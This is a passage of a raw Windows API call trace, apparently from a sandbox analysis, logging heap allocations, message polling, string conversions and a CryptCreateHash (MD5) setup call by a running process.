Size=0x8) returned 0x2e54ed8 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0269.317] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0269.317] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0269.317] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d00 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0269.317] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0269.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0269.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.318] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.318] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0269.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0269.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.318] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e520d8 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0269.318] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0269.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0269.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0269.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0269.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0269.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.319] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0269.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0269.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e521b0 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0269.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0269.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0269.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52150 [0269.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52150 | out: hHeap=0x970000) returned 1 [0269.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52150 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0269.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52150 | out: hHeap=0x970000) returned 1 [0269.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0269.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0269.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52150 [0269.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0269.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e520a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0269.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.322] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0269.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0269.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.323] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0269.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0269.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0269.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ef8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0269.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.324] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0269.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0269.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0269.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51c88 [0269.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0269.324] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0269.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0269.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: 